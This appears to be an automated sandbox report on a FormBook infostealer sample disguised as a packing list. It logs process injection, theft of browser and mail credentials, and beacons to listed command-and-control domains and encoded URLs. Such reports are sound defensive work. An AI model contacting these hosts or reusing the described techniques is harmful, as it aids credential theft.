      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information

      Source: Yara match | File source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\control.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Windows\SysWOW64\control.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

      Remote Access Functionality

      Source: Yara matchFile source: 00000003.00000000.345082941.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512821683.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.326684434.000000001030A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.353260864.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.512567942.0000000001330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.509273886.0000000000EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques followed by a count in parentheses were matched in this analysis; the count is the number of matching signatures/events):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (612); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); File Deletion (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (121); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); System Information Discovery (13); System Owner/User Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph (ID: 756334), sample: PI & PACKING LIST.exe, start date: 30/11/2022, architecture: WINDOWS, score: 100

Top-level signatures:
• Malicious sample detected (through community Yara rule)
• Antivirus detection for URL or domain
• Multi AV Scanner detection for submitted file
• 6 other signatures

Process and network graph (indentation shows the started/injected relationship):
• PI & PACKING LIST.exe (started)
  • Dropped file: C:\Users\user\...\PI & PACKING LIST.exe.log, ASCII
  • Signature: Injects a PE file into a foreign processes
  • PI & PACKING LIST.exe (started)
  • PI & PACKING LIST.exe (started)
    • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      • DNS/IP: www.cpitherapy.com, 178.128.239.245, ports 49700, 49701, 49702, DIGITALOCEAN-ASNUS, Netherlands
      • DNS/IP: www.p-soils.com, 162.43.120.154, ports 49703, 49704, 49705, CYBERTRAILSUS, United States
      • 5 other IPs or domains
      • Signature: System process connects to network (likely due to code injection or exploit)
      • control.exe (started)
        • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Deletes itself after installation; 2 other signatures

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample:
Source | Detection | Scanner | Label
PI & PACKING LIST.exe | 77% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
PI & PACKING LIST.exe | 57% | Virustotal |
PI & PACKING LIST.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches

Unpacked PE files:
Source | Detection | Scanner | Label
2.0.PI & PACKING LIST.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains:
Source | Detection | Scanner | Label
www.nu2uresale.store | 1% | Virustotal |
www.p-soils.com | 3% | Virustotal |
www.cpitherapy.com | 3% | Virustotal |

URLs:
Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY | 0% | Avira URL Cloud | safe
http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 | 100% | Avira URL Cloud | malware
http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 | 100% | Avira URL Cloud | malware
http://www.bengalindex.com/m5oe/ | 100% | Avira URL Cloud | malware
http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 | 100% | Avira URL Cloud | malware
http://www.nu2uresale.store/m5oe/ | 100% | Avira URL Cloud | malware
http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 | 100% | Avira URL Cloud | malware
http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 | 100% | Avira URL Cloud | malware
http://www.p-soils.com/m5oe/ | 100% | Avira URL Cloud | malware
http://35.78.89.117 | 0% | Avira URL Cloud | safe
http://www.cpitherapy.com/m5oe/ | 100% | Avira URL Cloud | malware
http://amh.sh/ | 0% | Avira URL Cloud | safe
www.singglostudio.com/m5oe/ | 0% | Avira URL Cloud | safe
http://amh.sh | 0% | Avira URL Cloud | safe
Domains and IPs

Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.nu2uresale.store | 209.99.64.33 | true | true | | unknown
www.p-soils.com | 162.43.120.154 | true | true | | unknown
www.zkjk888.com | 35.78.89.117 | true | true | | unknown
www.cpitherapy.com | 178.128.239.245 | true | true | | unknown
ghs.googlehosted.com | 142.250.203.115 | true | false | | unknown
www.bengalindex.com | unknown | unknown | true | | unknown
www.gebouwpas.online | unknown | unknown | true | | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://www.p-soils.com/m5oe/ | true | Avira URL Cloud: malware | unknown
http://www.bengalindex.com/m5oe/ | false | Avira URL Cloud: malware | unknown
http://www.cpitherapy.com/m5oe/?l48xI=Kdt0ttn6jBvm5dVCPGsq4sF6gZwVhJORDr+IW0q2lJvFs7kzNd/E4xjIZ8hkWN2nAiXaUCaRapMtLMo79OBUYLpofMwqWu/G3g==&y8dt=cR-TJP3pr48 | true | Avira URL Cloud: malware | unknown
http://www.zkjk888.com/m5oe/?l48xI=lXL2hA4gPGXGkrsXCHLs63wEyc6+ZxTcosJkE7OIAbbgzBCGQ1RLZhLXXwLUr0PxIclnwkI7OF+QM6Klss4VWWvRg6rabD2uNg==&y8dt=cR-TJP3pr48 | true | Avira URL Cloud: malware | unknown
www.singglostudio.com/m5oe/ | true | Avira URL Cloud: safe | low
http://www.nu2uresale.store/m5oe/ | true | Avira URL Cloud: malware | unknown
http://www.nu2uresale.store/m5oe/?l48xI=U9+cid+ik5YJF3jF27GFdJRqVXeG7FP+UvbSj6ZytGipCLvwOYSuUs/u1hqVfurTuH6/pVSyY1dCVh8DyPcg4wzd/AwTcksoYQ==&y8dt=cR-TJP3pr48 | true | Avira URL Cloud: malware | unknown
http://www.cpitherapy.com/m5oe/ | true | Avira URL Cloud: malware | unknown
http://www.p-soils.com/m5oe/?l48xI=OgbUJyD2Cs0iavfQBCvIOQvZdrfaRUMlkbnSDVoQDO79KZkwY+JyOZ2XW8xl2hee24/cs1yqqL6PnYlAwwwxD54r6/IzPRoMsg==&y8dt=cR-TJP3pr48 | true | Avira URL Cloud: malware | unknown
http://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY+gegrHfqcLEwJAZ2lhKdA1OTtZbcFcNKVJgIODn1wmw2XGX+PWpMZIoIdVyV5wA==&y8dt=cR-TJP3pr48 | false | Avira URL Cloud: malware | unknown
URLs from memory and binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
http://www.fontbureau.com/designersG | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 71M40-2OQ.13.dr | false | | high
http://www.fontbureau.com/designers/? | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://search.yahoo.com?fr=crmas_sfpf | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
http://www.tiro.com | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://amh.sh | control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.goodfont.co.kr | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.bengalindex.com/m5oe/?l48xI=yrQlZi/yeQekXtziTibn9LfL5FHN0Y47PbY | control.exe, 0000000D.00000002.517422506.0000000005BFE000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 71M40-2OQ.13.dr | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
http://www.carterandcone.coml | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ac.ecosia.org/autocomplete?q= | 71M40-2OQ.13.dr | false | | high
https://search.yahoo.com?fr=crmas_sfp | control.exe, 0000000D.00000003.438741340.000000000118C000.00000004.00000020.00020000.00000000.sdmp, 71M40-2OQ.13.dr | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://amh.sh/ | control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.como | PI & PACKING LIST.exe, 00000000.00000002.261208049.0000000000B37000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 71M40-2OQ.13.dr | false | | high
http://35.78.89.117 | control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
35.78.89.117 | www.zkjk888.com | United States | 16509 | AMAZON-02US | true
162.43.120.154 | www.p-soils.com | United States | 11333 | CYBERTRAILSUS | true
142.250.203.115 | ghs.googlehosted.com | United States | 15169 | GOOGLEUS | false
178.128.239.245 | www.cpitherapy.com | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
209.99.64.33 | www.nu2uresale.store | United States | 40034 | CONFLUENCE-NETWORK-INCVG | true

General Information
                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                        Analysis ID:756334
                                                        Start date and time:2022-11-30 01:54:10 +01:00
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 8m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:PI & PACKING LIST.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:15
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@6/2@6/5
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HDC Information:
                                                        • Successful, ratio: 44.7% (good quality ratio 39.2%)
                                                        • Quality average: 72%
                                                        • Quality standard deviation: 33%
                                                        HCA Information:
                                                        • Successful, ratio: 98%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                        • TCP Packets have been reduced to 100
                                                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 93.184.220.29, 209.197.3.8
                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, cs9.wac.phicdn.net, ocsp.digicert.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net
• Not all processes were analyzed, report is missing behavior information
